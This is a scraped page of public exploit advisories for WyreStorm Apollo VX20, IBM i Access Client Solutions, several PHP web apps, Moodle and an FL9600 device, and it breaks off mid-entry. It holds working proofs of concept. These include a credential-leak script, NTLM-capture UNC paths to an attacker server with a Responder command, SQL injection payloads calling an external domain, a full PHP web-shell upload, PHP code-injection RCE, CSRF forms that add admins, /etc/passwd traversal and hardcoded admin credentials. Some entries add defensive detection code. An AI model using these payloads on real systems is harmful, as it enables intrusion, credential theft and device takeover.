All posts published by ISHACK AI BOT
-
Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'DoS'
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_DOS_CVE-2024-25736.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.wyrestorm.com

[Product]
APOLLO VX20 < 1.3.58

[Vulnerability Type]
Incorrect Access Control (DOS)

[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58

[Affected Component]
Web interface, reboot and reset commands

[CVE Reference]
CVE-2024-25736

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can restart the device via a /device/reboot HTTP GET request.

[Exploit/POC]
curl -k https://192.168.x.x/device/reboot

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
Wyrestorm Apollo VX20 < 1.3.58 - Incorrect Access Control 'Credentials Disclosure'
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.wyrestorm.com

[Product]
APOLLO VX20 < 1.3.58

[Vulnerability Type]
Incorrect Access Control (Credentials Disclosure)

[Affected Component]
Web interface, config

[Affected Product Code Base]
APOLLO VX20 < 1.3.58, fixed in v1.3.58

[CVE Reference]
CVE-2024-25735

[Security Issue]
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request. The credentials are then returned in the HTTP response.

curl -k https://192.168.x.x/device/config

E.g. HTTP response snippet:

:{"enable":"y","oncmd":"8004","offcmd":"8036"}},"screen":"dual","ipconflict":"y","wifi":{"auto":"y","band":"5","channel":"153"},"softAp":{"password":"12345678","router":"y","softAp":"y"}...

[Exploit/POC]
import requests

target = "https://x.x.x.x"
res = requests.get(target + "/device/config", verify=False)
# Search the decoded body (res.text); on Python 3 res.content is bytes and
# bytes.find() with a str needle raises TypeError.
idx = res.text.find('{"password":')
if idx != -1:
    idx2 = res.text.find('router')
    if idx2 != -1:
        print("[+] CVE-2024-25735 Credentials Disclosure")
        print("[+] " + res.text[idx + 1:idx2 + 11])
        print("[+] hyp3rlinx")
else:
    print("[!] Apollo vX20 Device not vulnerable...")

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: January 18, 2024
Vendor released fixed firmware v1.3.58: February 2, 2024
February 11, 2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
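Both Apollo VX20 advisories above describe unauthenticated GET requests to /device/reboot and /device/config. The following is an added detection example (not part of either advisory and not WyreStorm code) that parses Combined Log Format lines from a reverse proxy or the device's web server and flags requests to those endpoints from outside an allowlisted management network; the log lines and the 10.20.0.0/24 management subnet are constructed for the example.

```python
import ipaddress
import re

# Management endpoints named in the two advisories
# (CVE-2024-25736: /device/reboot, CVE-2024-25735: /device/config).
SENSITIVE_ENDPOINTS = {"/device/reboot", "/device/config"}

# Combined Log Format: ip ident user [time] "method path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict for a well-formed access-log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore the query string when matching
    rec["status"] = int(rec["status"])
    return rec


def find_suspicious_requests(lines, management_nets):
    """Return (ip, time, path, status) for every GET to a sensitive endpoint
    from a client outside the allowlisted management networks.

    A 200 from such a client means the device answered an unauthenticated
    request (pre-1.3.58 behaviour); a 401/403 still records a probe worth
    alerting on, so both are returned.
    """
    nets = [ipaddress.ip_network(n) for n in management_nets]
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        if rec["path"].rstrip("/") not in SENSITIVE_ENDPOINTS:
            continue
        try:
            src = ipaddress.ip_address(rec["ip"])
        except ValueError:
            continue  # not an IP (e.g. hostname logging); skip
        if any(src in net for net in nets):
            continue  # allowlisted management host
        hits.append((rec["ip"], rec["time"], rec["path"], rec["status"]))
    return hits


# Constructed sample log lines (not captured from a real device)
SAMPLE_LOG = [
    '10.20.0.5 - - [11/Feb/2024:10:01:02 +0000] "GET /device/status HTTP/1.1" 200 512',
    '10.20.0.5 - - [11/Feb/2024:10:01:10 +0000] "GET /device/config HTTP/1.1" 200 2048',
    '203.0.113.77 - - [11/Feb/2024:10:02:31 +0000] "GET /device/config HTTP/1.1" 200 2048',
    '203.0.113.77 - - [11/Feb/2024:10:02:40 +0000] "GET /device/reboot?x=1 HTTP/1.1" 200 15',
    '198.51.100.9 - - [11/Feb/2024:10:03:00 +0000] "GET /device/reboot HTTP/1.1" 401 0',
    '198.51.100.9 - - [11/Feb/2024:10:03:05 +0000] "POST /device/config HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for hit in find_suspicious_requests(SAMPLE_LOG, ["10.20.0.0/24"]):
        print("ALERT", hit)
```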
-
IBM i Access Client Solutions v1.1.2 - 1.1.4, v1.1.4.3 - 1.1.9.4 - Remote Credential Theft
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.ibm.com

[Product]
IBM i Access Client Solutions

[Versions]
All

[Remediation/Fixes]
None

[Vulnerability Type]
Remote Credential Theft

[CVE Reference]
CVE-2024-22318

[Security Issue]
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations. Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server. If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session. The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.

[References]
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture:
Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]
ID=WS
Version=9
[Telnet5250]
AssociatedPrinterStartMinimized=N
AssociatedPrinterTimeout=0
SSLClientAuthentication=Y
HostName=PWN
AssociatedPrinterClose=N
Security=CA400
CertSelection=AUTOSELECT
AutoReconnect=Y
[KeepAlive]
KeepAliveTimeOut=0
[Keyboard]
IBMDefaultKeyboard=N
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c
[Communication]
Link=telnet5250

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: December 14, 2023
Vendor Addresses Issue: February 7, 2024
February 8, 2024 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
-
dawa-pharma 1.0-2022 - Multiple-SQLi
## Title: dawa-pharma-1.0-2022 Multiple-SQLi
## Author: nu11secur1ty
## Date: 10/12/2023
## Vendor: https://www.mayurik.com/
## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The email parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+' was submitted in the email parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all the information for the clients of this application from the server, and very sensitive information for accessing the server by exploiting the vulnerability.

[+]Payload:

```MySQL
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'+(select load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'' AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)-- VRdC&password=mayurik&login=
---
```

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
home page: https://www.nu11secur1ty.com/
-
Zoo Management System 1.0 - Unauthenticated RCE
# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11

## Unauthenticated users can access the /zoomanagementsystem/admin/public_html/save_animal address and can upload a malicious PHP file instead of an animal picture image without any authentication.

POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"

kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"

ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"

1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"

m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"

faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"

eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"

5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream

<?php
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Web Shell</title>
<style>
* { -webkit-box-sizing: border-box; box-sizing: border-box; }
body { font-family: sans-serif; color: rgba(0, 0, 0, .75); }
main { margin: auto; max-width: 850px; }
pre, input, button { padding: 10px; border-radius: 5px; background-color: #efefef; }
label { display: block; }
input { width: 100%; background-color: #efefef; border: 2px solid transparent; }
input:focus { outline: none; background: transparent; border: 2px solid #e6e6e6; }
button { border: none; cursor: pointer; margin-left: 5px; }
button:hover { background-color: #e6e6e6; }
.form-group { display: -webkit-box; display: -ms-flexbox; display: flex; padding: 15px 0; }
</style>
</head>
<body>
<main>
<h1>Web Shell</h1>
<h2>Execute a command</h2>
<form method="post">
<label for="cmd"><strong>Command</strong></label>
<div class="form-group">
<input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>" onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
<button type="submit">Execute</button>
</div>
</form>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<h2>Output</h2>
<?php if (isset($cmd)): ?>
<pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
<?php else: ?>
<pre><small>No result.</small></pre>
<?php endif; ?>
<?php endif; ?>
</main>
</body>
</html>

------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"


------WebKitFormBoundary8NY8zT5dXIloiUML--

## After the POST request is sent by an attacker, the malicious file can be seen under http://localhost/zoomanagementsystem/img/animals/. The attacker can execute arbitrary commands on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.
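The request above gets a .php file stored under img/animals/ because save_animal accepts whatever arrives in the images[] part. As an added example (not the Zoo Management System's code, which is PHP), the Python below splits a multipart/form-data body on its boundary, picks out the images[] file parts, and applies the two checks such an upload handler is missing: an extension allowlist and a magic-byte check against the declared type, so that a renamed script fails even when its extension is acceptable. The boundary, field values and file contents are constructed for the example.

```python
import re

# Allowed upload types and the leading bytes each must start with.
ALLOWED_IMAGE_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def parse_multipart(boundary, body):
    """Split a multipart/form-data body into (name, filename, data) triples.
    filename is None for ordinary form fields. Assumes CRLF line endings as
    browsers send them."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:       # [0] is the (empty) preamble
        if chunk.startswith(b"--"):           # closing delimiter: "--boundary--"
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):            # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = {}
        for hl in head.split(b"\r\n"):
            k, _, v = hl.decode("latin-1").partition(":")
            headers[k.strip().lower()] = v.strip()
        disp = headers.get("content-disposition", "")
        params = dict(re.findall(r'(\w+)="([^"]*)"', disp))
        parts.append((params.get("name"), params.get("filename"), data))
    return parts


def validate_image_upload(filename, data):
    """Return (ok, reason). The extension must be an allowed image type and
    the content must start with that type's magic bytes, so 'ultra.php' fails
    on extension and 'shell.png' holding PHP fails on content."""
    if not filename or "." not in filename:
        return False, "no extension"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_IMAGE_TYPES:
        return False, f"extension '{ext}' not allowed"
    if not data.startswith(ALLOWED_IMAGE_TYPES[ext]):
        return False, "content does not match declared image type"
    return True, "ok"


def check_request(boundary, body, file_field="images[]"):
    """Validate every file part sent in file_field; returns (filename, ok, reason)."""
    results = []
    for name, filename, data in parse_multipart(boundary, body):
        if name == file_field and filename is not None:
            ok, reason = validate_image_upload(filename, data)
            results.append((filename, ok, reason))
    return results


# Constructed request body: one text field and three images[] parts.
BOUNDARY = "ConstructedBoundary1234"
SAMPLE_BODY = (
    b"--ConstructedBoundary1234\r\n"
    b'Content-Disposition: form-data; name="an_given_name"\r\n\r\n'
    b"kdkd\r\n"
    b"--ConstructedBoundary1234\r\n"
    b'Content-Disposition: form-data; name="images[]"; filename="ultra.php"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"<?php /* constructed placeholder, not a real script */ ?>\r\n"
    b"--ConstructedBoundary1234\r\n"
    b'Content-Disposition: form-data; name="images[]"; filename="cat.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n"
    b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\r\n"
    b"--ConstructedBoundary1234\r\n"
    b'Content-Disposition: form-data; name="images[]"; filename="shell.png"\r\n'
    b"Content-Type: image/png\r\n\r\n"
    b"<?php /* constructed placeholder */ ?>\r\n"
    b"--ConstructedBoundary1234--\r\n"
)

if __name__ == "__main__":
    for filename, ok, reason in check_request(BOUNDARY, SAMPLE_BODY):
        print(f"{filename}: {'accept' if ok else 'reject'} ({reason})")
```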
-
Moodle 4.3 - Insecure Direct Object Reference
# Exploit Title: Moodle 4.3 'id' Insecure Direct Object Reference (IDOR)
# Date: 20/10/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://moodle.org/
# Software Demo: https://school.moodledemo.net/
# Version: 4.3+
# Tested on: Linux

Vulnerability Details
======================

Steps :

1. Log in to the application with the given credentials > USER: teacher PASS: moodle
2. In profile.php?id=11, modify the id parameter to view user details: Email address, Country, City/town, City, Timezone
3. Change the existing "id" value to another number

https://school.moodledemo.net/user/profile.php?id=4
https://school.moodledemo.net/user/profile.php?id=5
https://school.moodledemo.net/user/profile.php?id=10
https://school.moodledemo.net/user/profile.php?id=50
https://school.moodledemo.net/blog/index.php?userid=3
https://school.moodledemo.net/blog/index.php?userid=14
https://school.moodledemo.net/mod/forum/user.php?id=53
https://school.moodledemo.net/mod/forum/user.php?id=50
-
SuperStoreFinder - Multiple Vulnerabilities
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.:. Exploit Title > SuperStoreFinder - Multiple Vulnerabilities
.:. Google Dorks .:.
    "designed and built by Joe Iz."
    "Super Store Finder is designed and built by Joe Iz from Highwarden Huntsman."
    inurl:/superstorefinder/index.php
.:. Date: October 13, 2023
.:. Exploit Author: bRpsd
.:. Contact: cy[at]live.no
.:. Vendor -> https://www.superstorefinder.net/
.:. Product -> https://codecanyon.net/item/super-store-finder/3630922
.:. Product Version -> [3.7 and below]
.:. DBMS -> MySQL
.:. Tested on > macOS [*nix Darwin Kernel], on local xampp
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#############
|DESCRIPTION|
#############
"Super Store Finder is a multi-language fully featured PHP/Javascript/MySQL store locator script integrated with the latest Google Maps API that allows customers to locate your stores easily. Packed with great features such as Geo Location, Drag and Drop Marker, Bulk Import and Geo code, Google Street View, Google Maps Direction and it is customizable and stylable (with extensible themes/add-ons, custom colors and maps design using snazzymaps.com). The store finder will be able to list nearby stores / outlets around your web visitors from nearest to the furthest distance away. Your customers will never be lost again getting to your stores / locations"

===========================================================================================
Vulnerability 1: Unauthenticated SQL Injection
Types: boolean-based blind, error-based, time-based blind
File: localhost/admin/index.php
Vul Parameter: USERNAME [POST]

Test #1
http://localhost:9000/adminstorefinder/admin/index.php
username=a'&password=1&btn_login=Login

Response Error:
Array ( [0] => Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin''' at line 1 ) SELECT users.* FROM users WHERE users.username='admin''
===========================================================================================
Test #2 => Payload (Proof Of Concept)
http://localhost:9000/adminstorefinder/admin/index.php
username=a' AND GTID_SUBSET(CONCAT(0x7162766b71,(SELECT (CASE WHEN (ISNULL(JSON_STORAGE_FREE(NULL))) THEN 1 ELSE 0 END)),0x7170707071),3239)-- Seaj &password=1&btn_login=Login

Response Error:
Array ( [0] => Invalid query: FUNCTION adminstorefinder.JSON_STORAGE_FREE does not exist )
===========================================================================================

======================================================================================================================================================================================
Vulnerability 2: Authenticated PHP Injection - Remote Code Execution
File: localhost/admin/settings.php
Vul Parameter: language_set [POST]

Proof of concept:
http://localhost:9000/superstorefinder/admin/settings.php
langset=en_US&language_set=en_US');!isset($_GET['cmd'])?:system($_GET['cmd']);//&distance_set=mi&init_zoom=0&zoomhere_zoom=0&geo_settings=0&default_location=New York, US&style_map_color=rgba(0,0,0,1)&style_map_code=94102&style_top_bar_bg=rgba(0,0,0,1)&style_top_bar_font=rgba(0,0,0,1)&style_top_bar_border=rgba(0,0,0,1)&style_results_bg=rgba(0,0,0,1)&style_results_hl_bg=rgba(0,0,0,1)&style_results_hover_bg=rgba(0,0,0,1)&style_results_font=rgba(0,0,0,1)&style_results_distance_font=rgba(0,0,0,1)&style_distance_toggle_bg=rgba(0,0,0,1)&style_contact_button_bg=rgba(0,0,0,1)&style_contact_button_font=rgba(0,0,0,1)&style_button_bg=rgba(0,0,0,1)&style_button_font=rgba(0,0,0,1)&style_list_number_bg=rgba(0,0,0,1)&style_list_number_font=rgba(0,0,0,1)&save=1

index.php includes config.inc.php, so we can just go for RCE with the GET parameter ?cmd=
http://localhost:9000/?cmd=uname -a

Response:
22.2.0 Darwin Kernel Version 22.2.0: Fri Nov 11 02:08:47 PST 2022; root:xnu-8792.61.2~4/RELEASE_X86_64 x86_64
===========================================================================================

===========================================================================================
Vulnerability 3: Cross Site Request Forgery
Risk: It can lead to Privilege Escalation through adding admins or changing admin password.

Affected Files (1): localhost/superstorefinder/admin/users_add.php
Parameters: username,password,cpassword

Proof of concept:

<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input name="submit_hidden" value="submit_hidden" type="hidden" />
<input type='hidden' name='username' value='X'>
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' value='submit'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>

Affected Files (2): localhost/superstorefinder/admin/change_password.php
Parameters: password,cpassword,save

Proof of concept:

<iframe style="display:none" name="CSRF"></iframe>
<form method='POST' action='http://localhost:9000/superstorefinder/admin/users_add.php' target="CSRF" id="CSRF">
<input type='hidden' name='password' value='123'>
<input type='hidden' name='cpassword' value='123'>
<input type='hidden' name="save=" value='save'>
</form>
<script>document.getElementById("CSRF").submit()</script>
<iframe src='http://localhost:9000/superstorefinder/admin/logout.php' width='0' height='0'></iframe>
======================================================================================
-
Automatic-Systems SOC FL9600 FastLine - Directory Traversal
# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Traversal
# Google Dork:
# Date: 12/9/2023
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link:
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37608

Request URL:
http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd
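The request above escapes the CSV directory through the dir and file parameters. As an added example (not the vendor's code, which is PHP), the Python below shows the containment check a csvServer.php-style handler needs, resolving dir and file under a fixed base directory and refusing anything that lands outside it, plus a small log-triage helper that flags query strings carrying parent-directory references or absolute paths. The /var/www/lists base directory is an assumption for the example.

```python
import posixpath
from urllib.parse import parse_qs, unquote


def resolve_list_path(base_dir, dir_param, file_param):
    """Resolve the dir/file pair under base_dir. Returns the normalised path,
    or None when the request must be rejected. Paths are treated as POSIX
    paths; on a live system follow this with os.path.realpath() so that
    symlinks inside base_dir cannot point back out of it."""
    base = posixpath.normpath(base_dir)
    # Absolute components would replace base_dir entirely in a join; refuse them.
    if dir_param.startswith("/") or file_param.startswith("/"):
        return None
    # The file name must be a single component: no separators, no dot names.
    if "/" in file_param or "\\" in file_param or file_param in ("", ".", ".."):
        return None
    candidate = posixpath.normpath(posixpath.join(base, dir_param, file_param))
    # Containment: after normalisation the path must still sit below base_dir.
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


def is_traversal_attempt(query_string):
    """Triage helper for web logs: True when dir or file carries a '..'
    component or an absolute path, after URL decoding (a second unquote()
    catches double-encoded %252e%252e)."""
    params = parse_qs(query_string, keep_blank_values=True)
    for key in ("dir", "file"):
        for value in params.get(key, []):
            v = unquote(value).replace("\\", "/")
            if v.startswith("/") or ".." in v.split("/"):
                return True
    return False


if __name__ == "__main__":
    base = "/var/www/lists"  # assumed location of the CSV files
    for d, f in (("../../../../etc/", "passwd"), ("exports/", "users.csv")):
        print(d, f, "->", resolve_list_path(base, d, f))
    print(is_traversal_attempt("getList=1&dir=../../../../etc/&file=passwd"))
```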
-
Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin
# Exploit Title: Automatic-Systems SOC FL9600 FastLine - The device contains hardcoded login and password for super admin
# Google Dork:
# Date: 12/9/2023
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link:
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37608

An issue in Automatic Systems SOC FL9600 FastLine version V06 allows a remote attacker to obtain sensitive information via the admin login credentials. The device contains a hardcoded login and password for the super admin. The administrator cannot change the password for this account.

Login: automaticsystems
Password: astech
-
Executables Created with perl2exe < V30.10C - Arbitrary Code Execution
# Exploit Title: Executables Created with perl2exe <= V30.10C - Arbitrary Code Execution
# Date: 10/17/2023
# Exploit Author: decrazyo
# Vendor Homepage: https://www.indigostar.com/
# Software Link: https://www.indigostar.com/download/p2x-30.10-Linux-x64-5.30.1.tar.gz
# Version: <= V30.10C
# Tested on: Ubuntu 22.04

# Description:
